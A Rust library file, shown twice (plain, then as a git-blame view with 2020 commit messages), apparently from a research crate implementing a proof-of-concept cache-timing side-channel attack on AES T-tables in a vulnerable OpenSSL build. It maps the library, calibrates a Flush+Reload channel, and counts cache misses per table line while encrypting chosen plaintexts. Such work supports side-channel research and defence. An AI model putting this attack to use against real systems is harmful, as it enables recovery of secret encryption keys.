dendrobates-t-azureus/aes-t-tables/src/lib.rs

#![feature(specialization)]
#![feature(unsafe_block_in_unsafe_fn)]
#![deny(unsafe_op_in_unsafe_fn)]

use openssl::aes;

use crate::CacheStatus::Miss;
use memmap2::Mmap;
use openssl::aes::aes_ige;
use openssl::symm::Mode;
use std::collections::HashMap;
use std::fmt::Debug;
use std::fs::File;
use std::path::Path;

pub mod naive_flush_and_reload;
// Generic AES T-table attack flow

// Modularisation :
// The module handles loading, then passes the relevant target infos to a attack strategy object for calibration
// Then the module runs the attack, calling the attack strategy to make a measurement and return hit/miss

// interface for attack : run victim (eat a closure)
// interface for measure : give measurement target.

// Can attack strategies return err ?

// Load a vulnerable openssl - determine adresses af the T tables ?
// Run the calibrations
// Then start the attacks

// This is a serialized attack - either single threaded or synchronised

// parameters required

// an attacker measurement
// a calibration victim
#[derive(Debug, PartialEq, Eq, Clone, Copy)]
pub enum CacheStatus {
    Hit,
    Miss,
}

#[derive(Debug, PartialEq, Eq, Clone, Copy)]
pub enum ChannelFatalError {
    Oops,
}

pub enum SideChannelError {
    NeedRecalibration,
    FatalError(ChannelFatalError),
    AddressNotReady(*const u8),
    AddressNotCalibrated(*const u8),
}

/*
pub enum CacheSideChannel {
    SingleAddr,
    MultipleAddr,
}
*/

// Access Driven

pub trait SimpleCacheSideChannel {
    // TODO
}

pub trait TableCacheSideChannel {
    //type ChannelFatalError: Debug;
    unsafe fn calibrate(
        &mut self,
        addresses: impl IntoIterator<Item = *const u8> + Clone,
    ) -> Result<(), ChannelFatalError>;
    unsafe fn attack<'a, 'b>(
        &'a mut self,
        addresses: impl IntoIterator<Item = *const u8> + Clone,
        victim: &'b dyn Fn(),
    ) -> Result<Vec<(*const u8, CacheStatus)>, ChannelFatalError>;
}

pub trait SingleAddrCacheSideChannel: Debug {
    //type SingleChannelFatalError: Debug;

    unsafe fn test_single(&mut self, addr: *const u8) -> Result<CacheStatus, SideChannelError>;
    unsafe fn prepare_single(&mut self, addr: *const u8) -> Result<(), SideChannelError>;
    fn victim_single(&mut self, operation: &dyn Fn());
    unsafe fn calibrate_single(
        &mut self,
        addresses: impl IntoIterator<Item = *const u8> + Clone,
    ) -> Result<(), ChannelFatalError>;
}

pub trait MultipleAddrCacheSideChannel: Debug {
    //type MultipleChannelFatalError: Debug;

    unsafe fn test(
        &mut self,
        addresses: impl IntoIterator<Item = *const u8> + Clone,
    ) -> Result<Vec<(*const u8, CacheStatus)>, SideChannelError>;
    unsafe fn prepare(
        &mut self,
        addresses: impl IntoIterator<Item = *const u8> + Clone,
    ) -> Result<(), SideChannelError>;
    fn victim(&mut self, operation: &dyn Fn());
    unsafe fn calibrate(
        &mut self,
        addresses: impl IntoIterator<Item = *const u8> + Clone,
    ) -> Result<(), ChannelFatalError>;
}

impl<T: SingleAddrCacheSideChannel> TableCacheSideChannel for T {
    default unsafe fn calibrate(
        &mut self,
        addresses: impl IntoIterator<Item = *const u8> + Clone,
    ) -> Result<(), ChannelFatalError> {
        unsafe { self.calibrate_single(addresses) }
    }
    //type ChannelFatalError = T::SingleChannelFatalError;

    default unsafe fn attack<'a, 'b, 'c>(
        &'a mut self,
        addresses: impl IntoIterator<Item = *const u8> + Clone,
        victim: &'c dyn Fn(),
    ) -> Result<Vec<(*const u8, CacheStatus)>, ChannelFatalError> {
        let mut result = Vec::new();

        for addr in addresses {
            match unsafe { self.prepare_single(addr) } {
                Ok(_) => {}
                Err(e) => match e {
                    SideChannelError::NeedRecalibration => unimplemented!(),
                    SideChannelError::FatalError(e) => return Err(e),
                    SideChannelError::AddressNotReady(_addr) => panic!(),
                    SideChannelError::AddressNotCalibrated(_addr) => unimplemented!(),
                },
            }
            self.victim_single(victim);
            let r = unsafe { self.test_single(addr) };
            match r {
                Ok(status) => {
                    result.push((addr, status));
                }
                Err(e) => match e {
                    SideChannelError::NeedRecalibration => panic!(),
                    SideChannelError::FatalError(e) => {
                        return Err(e);
                    }
                    _ => panic!(),
                },
            }
        }
        Ok(result)
    }
}

// TODO

impl<T: MultipleAddrCacheSideChannel> SingleAddrCacheSideChannel for T {
    unsafe fn test_single(&mut self, addr: *const u8) -> Result<CacheStatus, SideChannelError> {
        let addresses = vec![addr];
        unsafe { self.test(addresses) }.map(|v| v[0].1)
    }

    unsafe fn prepare_single(&mut self, addr: *const u8) -> Result<(), SideChannelError> {
        let addresses = vec![addr];
        unsafe { self.prepare(addresses) }
    }

    fn victim_single(&mut self, operation: &dyn Fn()) {
        self.victim(operation);
    }

    unsafe fn calibrate_single(
        &mut self,
        addresses: impl IntoIterator<Item = *const u8> + Clone,
    ) -> Result<(), ChannelFatalError> {
        unsafe { self.calibrate(addresses) }
    }
}

fn table_cache_side_channel_calibrate_impl<T: MultipleAddrCacheSideChannel>(
    s: &mut T,
    addresses: impl IntoIterator<Item = *const u8> + Clone,
) -> Result<(), ChannelFatalError> {
    unsafe { s.calibrate(addresses) }
}

impl<T: MultipleAddrCacheSideChannel> TableCacheSideChannel for T {
    unsafe fn calibrate(
        &mut self,
        addresses: impl IntoIterator<Item = *const u8> + Clone,
    ) -> Result<(), ChannelFatalError> {
        table_cache_side_channel_calibrate_impl(self, addresses)
        //self.calibrate(addresses)
    }
    //type ChannelFatalError = T::MultipleChannelFatalError;

    unsafe fn attack<'a, 'b, 'c>(
        &'a mut self,
        addresses: impl IntoIterator<Item = *const u8> + Clone,
        victim: &'c dyn Fn(),
    ) -> Result<Vec<(*const u8, CacheStatus)>, ChannelFatalError> {
        match unsafe { MultipleAddrCacheSideChannel::prepare(self, addresses.clone()) } {
            Ok(_) => {}
            Err(e) => match e {
                SideChannelError::NeedRecalibration => unimplemented!(),
                SideChannelError::FatalError(e) => return Err(e),
                SideChannelError::AddressNotReady(_addr) => panic!(),
                SideChannelError::AddressNotCalibrated(_addr) => unimplemented!(),
            },
        }
        MultipleAddrCacheSideChannel::victim(self, victim);

        let r = unsafe { MultipleAddrCacheSideChannel::test(self, addresses) }; // Fixme error handling
        match r {
            Err(e) => match e {
                SideChannelError::NeedRecalibration => {
                    panic!();
                }
                SideChannelError::FatalError(e) => Err(e),
                _ => panic!(),
            },
            Ok(v) => Ok(v),
        }
    }
}

pub struct AESTTableParams<'a> {
    pub num_encryptions: u32,
    pub key: [u8; 32],
    pub openssl_path: &'a Path,
    pub te: [isize; 4],
}

pub unsafe fn attack_t_tables_poc(
    side_channel: &mut impl TableCacheSideChannel,
    parameters: AESTTableParams,
) {
    attack_t_tables_poc_impl(side_channel, parameters)
}

fn attack_t_tables_poc_impl(
    side_channel: &mut impl TableCacheSideChannel,
    parameters: AESTTableParams,
) {
    // Note : This function doesn't handle the case where the address space is not shared. (Additionally you have the issue of complicated eviction sets due to complex addressing)
    // TODO

    // Possible enhancements : use ability to monitor several addresses simultaneously.
    let fd = File::open(parameters.openssl_path).unwrap();
    let mmap = unsafe { Mmap::map(&fd).unwrap() };
    let base = mmap.as_ptr();

    let te0 = unsafe { base.offset(parameters.te[0]) };
    if unsafe { (te0 as *const u64).read() } != 0xf87c7c84c66363a5 {
        panic!("Hmm This does not look like a T-table, check your address and the openssl used")
    }

    let key_struct = aes::AesKey::new_encrypt(&parameters.key).unwrap();

    //let mut plaintext = [0u8; 16];
    //let mut result = [0u8; 16];

    let mut timings: HashMap<*const u8, HashMap<u8, u32>> = HashMap::new();

    let addresses = parameters
        .te
        .iter()
        .map(|&start| ((start)..(start + 64 * 16)).step_by(64))
        .flatten()
        .map(|offset| unsafe { base.offset(offset) });

    unsafe { side_channel.calibrate(addresses.clone()).unwrap() };

    for addr in addresses.clone() {
        let mut timing = HashMap::new();
        for b in (u8::min_value()..=u8::max_value()).step_by(16) {
            timing.insert(b, 0);
        }
        timings.insert(addr, timing);
    }

    for b in (u8::min_value()..=u8::max_value()).step_by(16) {
        //plaintext[0] = b;
        eprintln!("Probing with b = {:x}", b);
        // fixme magic numbers

        let victim = || {
            let mut plaintext = [0u8; 16];
            plaintext[0] = b;
            for byte in plaintext.iter_mut().skip(1) {
                *byte = rand::random();
            }
            let mut iv = [0u8; 32];
            let mut result = [0u8; 16];
            aes_ige(&plaintext, &mut result, &key_struct, &mut iv, Mode::Encrypt);
        };

        for _ in 0..100 {
            let r = unsafe { side_channel.attack(addresses.clone(), &victim) };
            match r {
                Ok(v) => {
                    for (probe, status) in v {
                        if status == Miss {
                            *timings.get_mut(&probe).unwrap().entry(b).or_insert(0) += 0;
                        }
                    }
                }
                Err(_) => panic!("Attack failed"),
            }
        }

        for _ in 0..parameters.num_encryptions {
            let r = unsafe { side_channel.attack(addresses.clone(), &victim) };
            match r {
                Ok(v) => {
                    for (probe, status) in v {
                        if status == Miss {
                            *timings.get_mut(&probe).unwrap().entry(b).or_insert(0) += 1;
                        }
                    }
                }
                Err(_) => panic!("Attack failed"),
            }
        }
    }
    for probe in addresses {
        print!("{:p}", probe);
        for b in (u8::min_value()..=u8::max_value()).step_by(16) {
            print!(" {:4}", timings[&probe][&b]);
        }
        println!();
    }
}
Get the foundation for optimized version using Flush and Flush 2020-08-19 14:34:52 +02:00			`#![feature(specialization)]`
Fix a fex clippy issues and mark interfaces as unsafe 2020-09-22 16:49:22 +02:00			`#![feature(unsafe_block_in_unsafe_fn)]`
			`#![deny(unsafe_op_in_unsafe_fn)]`
Get the foundation for optimized version using Flush and Flush 2020-08-19 14:34:52 +02:00
First version of aes T table attack - using flush and reload naively 2020-08-19 10:07:48 +02:00			`use openssl::aes;`

Make AES T-table attack 2020-09-22 14:30:08 +02:00			`use crate::CacheStatus::Miss;`
First version of aes T table attack - using flush and reload naively 2020-08-19 10:07:48 +02:00			`use memmap2::Mmap;`
			`use openssl::aes::aes_ige;`
			`use openssl::symm::Mode;`
			`use std::collections::HashMap;`
			`use std::fmt::Debug;`
			`use std::fs::File;`
			`use std::path::Path;`

Make AES T-table attack 2020-09-22 14:30:08 +02:00			`pub mod naive_flush_and_reload;`
Add a draft module for AES attacks 2020-08-04 14:33:33 +02:00			`// Generic AES T-table attack flow`

			`// Modularisation :`
			`// The module handles loading, then passes the relevant target infos to a attack strategy object for calibration`
			`// Then the module runs the attack, calling the attack strategy to make a measurement and return hit/miss`

			`// interface for attack : run victim (eat a closure)`
			`// interface for measure : give measurement target.`

			`// Can attack strategies return err ?`

			`// Load a vulnerable openssl - determine adresses af the T tables ?`
			`// Run the calibrations`
			`// Then start the attacks`

			`// This is a serialized attack - either single threaded or synchronised`

			`// parameters required`

			`// an attacker measurement`
			`// a calibration victim`
Make AES T-table attack 2020-09-22 14:30:08 +02:00			`#[derive(Debug, PartialEq, Eq, Clone, Copy)]`
First version of aes T table attack - using flush and reload naively 2020-08-19 10:07:48 +02:00			`pub enum CacheStatus {`
			`Hit,`
			`Miss,`
			`}`

Make AES T-table attack 2020-09-22 14:30:08 +02:00			`#[derive(Debug, PartialEq, Eq, Clone, Copy)]`
Get the foundation for optimized version using Flush and Flush 2020-08-19 14:34:52 +02:00			`pub enum ChannelFatalError {`
			`Oops,`
			`}`

			`pub enum SideChannelError {`
First version of aes T table attack - using flush and reload naively 2020-08-19 10:07:48 +02:00			`NeedRecalibration,`
Get the foundation for optimized version using Flush and Flush 2020-08-19 14:34:52 +02:00			`FatalError(ChannelFatalError),`
Make AES T-table attack 2020-09-22 14:30:08 +02:00			`AddressNotReady(*const u8),`
			`AddressNotCalibrated(*const u8),`
First version of aes T table attack - using flush and reload naively 2020-08-19 10:07:48 +02:00			`}`

			`/*`
			`pub enum CacheSideChannel {`
			`SingleAddr,`
			`MultipleAddr,`
			`}`
			`*/`

			`// Access Driven`

			`pub trait SimpleCacheSideChannel {`
			`// TODO`
			`}`

			`pub trait TableCacheSideChannel {`
Get the foundation for optimized version using Flush and Flush 2020-08-19 14:34:52 +02:00			`//type ChannelFatalError: Debug;`
Fix a fex clippy issues and mark interfaces as unsafe 2020-09-22 16:49:22 +02:00			`unsafe fn calibrate(`
Make AES T-table attack 2020-09-22 14:30:08 +02:00			`&mut self,`
			`addresses: impl IntoIterator<Item = *const u8> + Clone,`
			`) -> Result<(), ChannelFatalError>;`
Fix a fex clippy issues and mark interfaces as unsafe 2020-09-22 16:49:22 +02:00			`unsafe fn attack<'a, 'b>(`
First version of aes T table attack - using flush and reload naively 2020-08-19 10:07:48 +02:00			`&'a mut self,`
Get the foundation for optimized version using Flush and Flush 2020-08-19 14:34:52 +02:00			`addresses: impl IntoIterator<Item = *const u8> + Clone,`
Fix a fex clippy issues and mark interfaces as unsafe 2020-09-22 16:49:22 +02:00			`victim: &'b dyn Fn(),`
Get the foundation for optimized version using Flush and Flush 2020-08-19 14:34:52 +02:00			`) -> Result<Vec<(*const u8, CacheStatus)>, ChannelFatalError>;`
First version of aes T table attack - using flush and reload naively 2020-08-19 10:07:48 +02:00			`}`

			`pub trait SingleAddrCacheSideChannel: Debug {`
Get the foundation for optimized version using Flush and Flush 2020-08-19 14:34:52 +02:00			`//type SingleChannelFatalError: Debug;`
First version of aes T table attack - using flush and reload naively 2020-08-19 10:07:48 +02:00
Fix a fex clippy issues and mark interfaces as unsafe 2020-09-22 16:49:22 +02:00			`unsafe fn test_single(&mut self, addr: *const u8) -> Result<CacheStatus, SideChannelError>;`
			`unsafe fn prepare_single(&mut self, addr: *const u8) -> Result<(), SideChannelError>;`
Make AES T-table attack 2020-09-22 14:30:08 +02:00			`fn victim_single(&mut self, operation: &dyn Fn());`
Fix a fex clippy issues and mark interfaces as unsafe 2020-09-22 16:49:22 +02:00			`unsafe fn calibrate_single(`
First version of aes T table attack - using flush and reload naively 2020-08-19 10:07:48 +02:00			`&mut self,`
Get the foundation for optimized version using Flush and Flush 2020-08-19 14:34:52 +02:00			`addresses: impl IntoIterator<Item = *const u8> + Clone,`
			`) -> Result<(), ChannelFatalError>;`
First version of aes T table attack - using flush and reload naively 2020-08-19 10:07:48 +02:00			`}`

			`pub trait MultipleAddrCacheSideChannel: Debug {`
Get the foundation for optimized version using Flush and Flush 2020-08-19 14:34:52 +02:00			`//type MultipleChannelFatalError: Debug;`

Fix a fex clippy issues and mark interfaces as unsafe 2020-09-22 16:49:22 +02:00			`unsafe fn test(`
Get the foundation for optimized version using Flush and Flush 2020-08-19 14:34:52 +02:00			`&mut self,`
			`addresses: impl IntoIterator<Item = *const u8> + Clone,`
			`) -> Result<Vec<(*const u8, CacheStatus)>, SideChannelError>;`
Fix a fex clippy issues and mark interfaces as unsafe 2020-09-22 16:49:22 +02:00			`unsafe fn prepare(`
Make AES T-table attack 2020-09-22 14:30:08 +02:00			`&mut self,`
			`addresses: impl IntoIterator<Item = *const u8> + Clone,`
			`) -> Result<(), SideChannelError>;`
Get the foundation for optimized version using Flush and Flush 2020-08-19 14:34:52 +02:00			`fn victim(&mut self, operation: &dyn Fn());`
Fix a fex clippy issues and mark interfaces as unsafe 2020-09-22 16:49:22 +02:00			`unsafe fn calibrate(`
Get the foundation for optimized version using Flush and Flush 2020-08-19 14:34:52 +02:00			`&mut self,`
			`addresses: impl IntoIterator<Item = *const u8> + Clone,`
			`) -> Result<(), ChannelFatalError>;`
First version of aes T table attack - using flush and reload naively 2020-08-19 10:07:48 +02:00			`}`

			`impl<T: SingleAddrCacheSideChannel> TableCacheSideChannel for T {`
Fix a fex clippy issues and mark interfaces as unsafe 2020-09-22 16:49:22 +02:00			`default unsafe fn calibrate(`
Make AES T-table attack 2020-09-22 14:30:08 +02:00			`&mut self,`
			`addresses: impl IntoIterator<Item = *const u8> + Clone,`
			`) -> Result<(), ChannelFatalError> {`
Fix a fex clippy issues and mark interfaces as unsafe 2020-09-22 16:49:22 +02:00			`unsafe { self.calibrate_single(addresses) }`
Get the foundation for optimized version using Flush and Flush 2020-08-19 14:34:52 +02:00			`}`
			`//type ChannelFatalError = T::SingleChannelFatalError;`
First version of aes T table attack - using flush and reload naively 2020-08-19 10:07:48 +02:00
Fix a fex clippy issues and mark interfaces as unsafe 2020-09-22 16:49:22 +02:00			`default unsafe fn attack<'a, 'b, 'c>(`
First version of aes T table attack - using flush and reload naively 2020-08-19 10:07:48 +02:00			`&'a mut self,`
Get the foundation for optimized version using Flush and Flush 2020-08-19 14:34:52 +02:00			`addresses: impl IntoIterator<Item = *const u8> + Clone,`
First version of aes T table attack - using flush and reload naively 2020-08-19 10:07:48 +02:00			`victim: &'c dyn Fn(),`
Get the foundation for optimized version using Flush and Flush 2020-08-19 14:34:52 +02:00			`) -> Result<Vec<(*const u8, CacheStatus)>, ChannelFatalError> {`
First version of aes T table attack - using flush and reload naively 2020-08-19 10:07:48 +02:00			`let mut result = Vec::new();`

			`for addr in addresses {`
Fix a fex clippy issues and mark interfaces as unsafe 2020-09-22 16:49:22 +02:00			`match unsafe { self.prepare_single(addr) } {`
Make AES T-table attack 2020-09-22 14:30:08 +02:00			`Ok(_) => {}`
			`Err(e) => match e {`
			`SideChannelError::NeedRecalibration => unimplemented!(),`
			`SideChannelError::FatalError(e) => return Err(e),`
			`SideChannelError::AddressNotReady(_addr) => panic!(),`
			`SideChannelError::AddressNotCalibrated(_addr) => unimplemented!(),`
			`},`
			`}`
			`self.victim_single(victim);`
Fix a fex clippy issues and mark interfaces as unsafe 2020-09-22 16:49:22 +02:00			`let r = unsafe { self.test_single(addr) };`
First version of aes T table attack - using flush and reload naively 2020-08-19 10:07:48 +02:00			`match r {`
			`Ok(status) => {`
			`result.push((addr, status));`
			`}`
			`Err(e) => match e {`
			`SideChannelError::NeedRecalibration => panic!(),`
			`SideChannelError::FatalError(e) => {`
			`return Err(e);`
			`}`
Make result more legible 2020-08-19 15:09:29 +02:00			`_ => panic!(),`
First version of aes T table attack - using flush and reload naively 2020-08-19 10:07:48 +02:00			`},`
			`}`
			`}`
			`Ok(result)`
			`}`
			`}`

Make AES T-table attack 2020-09-22 14:30:08 +02:00			`// TODO`

Get the foundation for optimized version using Flush and Flush 2020-08-19 14:34:52 +02:00			`impl<T: MultipleAddrCacheSideChannel> SingleAddrCacheSideChannel for T {`
Fix a fex clippy issues and mark interfaces as unsafe 2020-09-22 16:49:22 +02:00			`unsafe fn test_single(&mut self, addr: *const u8) -> Result<CacheStatus, SideChannelError> {`
Make AES T-table attack 2020-09-22 14:30:08 +02:00			`let addresses = vec![addr];`
Fix a fex clippy issues and mark interfaces as unsafe 2020-09-22 16:49:22 +02:00			`unsafe { self.test(addresses) }.map(\|v\| v[0].1)`
Get the foundation for optimized version using Flush and Flush 2020-08-19 14:34:52 +02:00			`}`

Fix a fex clippy issues and mark interfaces as unsafe 2020-09-22 16:49:22 +02:00			`unsafe fn prepare_single(&mut self, addr: *const u8) -> Result<(), SideChannelError> {`
Make AES T-table attack 2020-09-22 14:30:08 +02:00			`let addresses = vec![addr];`
Fix a fex clippy issues and mark interfaces as unsafe 2020-09-22 16:49:22 +02:00			`unsafe { self.prepare(addresses) }`
Get the foundation for optimized version using Flush and Flush 2020-08-19 14:34:52 +02:00			`}`

Make AES T-table attack 2020-09-22 14:30:08 +02:00			`fn victim_single(&mut self, operation: &dyn Fn()) {`
			`self.victim(operation);`
Get the foundation for optimized version using Flush and Flush 2020-08-19 14:34:52 +02:00			`}`

Fix a fex clippy issues and mark interfaces as unsafe 2020-09-22 16:49:22 +02:00			`unsafe fn calibrate_single(`
Get the foundation for optimized version using Flush and Flush 2020-08-19 14:34:52 +02:00			`&mut self,`
			`addresses: impl IntoIterator<Item = *const u8> + Clone,`
			`) -> Result<(), ChannelFatalError> {`
Fix a fex clippy issues and mark interfaces as unsafe 2020-09-22 16:49:22 +02:00			`unsafe { self.calibrate(addresses) }`
Get the foundation for optimized version using Flush and Flush 2020-08-19 14:34:52 +02:00			`}`
			`}`

Fix a fex clippy issues and mark interfaces as unsafe 2020-09-22 16:49:22 +02:00			`fn table_cache_side_channel_calibrate_impl<T: MultipleAddrCacheSideChannel>(`
			`s: &mut T,`
			`addresses: impl IntoIterator<Item = *const u8> + Clone,`
			`) -> Result<(), ChannelFatalError> {`
			`unsafe { s.calibrate(addresses) }`
			`}`

Get the foundation for optimized version using Flush and Flush 2020-08-19 14:34:52 +02:00			`impl<T: MultipleAddrCacheSideChannel> TableCacheSideChannel for T {`
Fix a fex clippy issues and mark interfaces as unsafe 2020-09-22 16:49:22 +02:00			`unsafe fn calibrate(`
Make AES T-table attack 2020-09-22 14:30:08 +02:00			`&mut self,`
			`addresses: impl IntoIterator<Item = *const u8> + Clone,`
			`) -> Result<(), ChannelFatalError> {`
Fix a fex clippy issues and mark interfaces as unsafe 2020-09-22 16:49:22 +02:00			`table_cache_side_channel_calibrate_impl(self, addresses)`
			`//self.calibrate(addresses)`
Get the foundation for optimized version using Flush and Flush 2020-08-19 14:34:52 +02:00			`}`
			`//type ChannelFatalError = T::MultipleChannelFatalError;`

Fix a fex clippy issues and mark interfaces as unsafe 2020-09-22 16:49:22 +02:00			`unsafe fn attack<'a, 'b, 'c>(`
Get the foundation for optimized version using Flush and Flush 2020-08-19 14:34:52 +02:00			`&'a mut self,`
			`addresses: impl IntoIterator<Item = *const u8> + Clone,`
			`victim: &'c dyn Fn(),`
			`) -> Result<Vec<(*const u8, CacheStatus)>, ChannelFatalError> {`
Fix a fex clippy issues and mark interfaces as unsafe 2020-09-22 16:49:22 +02:00			`match unsafe { MultipleAddrCacheSideChannel::prepare(self, addresses.clone()) } {`
Make AES T-table attack 2020-09-22 14:30:08 +02:00			`Ok(_) => {}`
			`Err(e) => match e {`
			`SideChannelError::NeedRecalibration => unimplemented!(),`
			`SideChannelError::FatalError(e) => return Err(e),`
			`SideChannelError::AddressNotReady(_addr) => panic!(),`
			`SideChannelError::AddressNotCalibrated(_addr) => unimplemented!(),`
			`},`
			`}`
Get the foundation for optimized version using Flush and Flush 2020-08-19 14:34:52 +02:00			`MultipleAddrCacheSideChannel::victim(self, victim);`
Make AES T-table attack 2020-09-22 14:30:08 +02:00
Fix a fex clippy issues and mark interfaces as unsafe 2020-09-22 16:49:22 +02:00			`let r = unsafe { MultipleAddrCacheSideChannel::test(self, addresses) }; // Fixme error handling`
Get the foundation for optimized version using Flush and Flush 2020-08-19 14:34:52 +02:00			`match r {`
			`Err(e) => match e {`
			`SideChannelError::NeedRecalibration => {`
			`panic!();`
			`}`
			`SideChannelError::FatalError(e) => Err(e),`
Make result more legible 2020-08-19 15:09:29 +02:00			`_ => panic!(),`
Get the foundation for optimized version using Flush and Flush 2020-08-19 14:34:52 +02:00			`},`
			`Ok(v) => Ok(v),`
			`}`
			`}`
			`}`

First version of aes T table attack - using flush and reload naively 2020-08-19 10:07:48 +02:00			`pub struct AESTTableParams<'a> {`
			`pub num_encryptions: u32,`
			`pub key: [u8; 32],`
			`pub openssl_path: &'a Path,`
			`pub te: [isize; 4],`
			`}`

Fix a fex clippy issues and mark interfaces as unsafe 2020-09-22 16:49:22 +02:00			`pub unsafe fn attack_t_tables_poc(`
			`side_channel: &mut impl TableCacheSideChannel,`
			`parameters: AESTTableParams,`
			`) {`
			`attack_t_tables_poc_impl(side_channel, parameters)`
			`}`

			`fn attack_t_tables_poc_impl(`
First version of aes T table attack - using flush and reload naively 2020-08-19 10:07:48 +02:00			`side_channel: &mut impl TableCacheSideChannel,`
			`parameters: AESTTableParams,`
Fix a fex clippy issues and mark interfaces as unsafe 2020-09-22 16:49:22 +02:00			`) {`
First version of aes T table attack - using flush and reload naively 2020-08-19 10:07:48 +02:00			`// Note : This function doesn't handle the case where the address space is not shared. (Additionally you have the issue of complicated eviction sets due to complex addressing)`
			`// TODO`

			`// Possible enhancements : use ability to monitor several addresses simultaneously.`
			`let fd = File::open(parameters.openssl_path).unwrap();`
			`let mmap = unsafe { Mmap::map(&fd).unwrap() };`
			`let base = mmap.as_ptr();`

			`let te0 = unsafe { base.offset(parameters.te[0]) };`
			`if unsafe { (te0 as *const u64).read() } != 0xf87c7c84c66363a5 {`
			`panic!("Hmm This does not look like a T-table, check your address and the openssl used")`
			`}`

			`let key_struct = aes::AesKey::new_encrypt(&parameters.key).unwrap();`

			`//let mut plaintext = [0u8; 16];`
			`//let mut result = [0u8; 16];`

			`let mut timings: HashMap<*const u8, HashMap<u8, u32>> = HashMap::new();`

			`let addresses = parameters`
			`.te`
			`.iter()`
			`.map(\|&start\| ((start)..(start + 64 * 16)).step_by(64))`
			`.flatten()`
			`.map(\|offset\| unsafe { base.offset(offset) });`

Fix a fex clippy issues and mark interfaces as unsafe 2020-09-22 16:49:22 +02:00			`unsafe { side_channel.calibrate(addresses.clone()).unwrap() };`
Get the foundation for optimized version using Flush and Flush 2020-08-19 14:34:52 +02:00
First version of aes T table attack - using flush and reload naively 2020-08-19 10:07:48 +02:00			`for addr in addresses.clone() {`
Make result more legible 2020-08-19 15:09:29 +02:00			`let mut timing = HashMap::new();`
			`for b in (u8::min_value()..=u8::max_value()).step_by(16) {`
			`timing.insert(b, 0);`
			`}`
			`timings.insert(addr, timing);`
First version of aes T table attack - using flush and reload naively 2020-08-19 10:07:48 +02:00			`}`

			`for b in (u8::min_value()..=u8::max_value()).step_by(16) {`
			`//plaintext[0] = b;`
			`eprintln!("Probing with b = {:x}", b);`
			`// fixme magic numbers`

			`let victim = \|\| {`
			`let mut plaintext = [0u8; 16];`
			`plaintext[0] = b;`
Fix a fex clippy issues and mark interfaces as unsafe 2020-09-22 16:49:22 +02:00			`for byte in plaintext.iter_mut().skip(1) {`
			`*byte = rand::random();`
First version of aes T table attack - using flush and reload naively 2020-08-19 10:07:48 +02:00			`}`
			`let mut iv = [0u8; 32];`
			`let mut result = [0u8; 16];`
			`aes_ige(&plaintext, &mut result, &key_struct, &mut iv, Mode::Encrypt);`
			`};`
Make AES T-table attack 2020-09-22 14:30:08 +02:00
			`for _ in 0..100 {`
Fix a fex clippy issues and mark interfaces as unsafe 2020-09-22 16:49:22 +02:00			`let r = unsafe { side_channel.attack(addresses.clone(), &victim) };`
Make AES T-table attack 2020-09-22 14:30:08 +02:00			`match r {`
			`Ok(v) => {`
			`for (probe, status) in v {`
			`if status == Miss {`
			`*timings.get_mut(&probe).unwrap().entry(b).or_insert(0) += 0;`
			`}`
			`}`
			`}`
			`Err(_) => panic!("Attack failed"),`
			`}`
			`}`

			`for _ in 0..parameters.num_encryptions {`
Fix a fex clippy issues and mark interfaces as unsafe 2020-09-22 16:49:22 +02:00			`let r = unsafe { side_channel.attack(addresses.clone(), &victim) };`
First version of aes T table attack - using flush and reload naively 2020-08-19 10:07:48 +02:00			`match r {`
			`Ok(v) => {`
			`for (probe, status) in v {`
Make result more legible 2020-08-19 15:09:29 +02:00			`if status == Miss {`
First version of aes T table attack - using flush and reload naively 2020-08-19 10:07:48 +02:00			`*timings.get_mut(&probe).unwrap().entry(b).or_insert(0) += 1;`
			`}`
			`}`
			`}`
			`Err(_) => panic!("Attack failed"),`
			`}`
			`}`
			`}`
			`for probe in addresses {`
			`print!("{:p}", probe);`
			`for b in (u8::min_value()..=u8::max_value()).step_by(16) {`
Make AES T-table attack 2020-09-22 14:30:08 +02:00			`print!(" {:4}", timings[&probe][&b]);`
First version of aes T table attack - using flush and reload naively 2020-08-19 10:07:48 +02:00			`}`
			`println!();`
			`}`
			`}`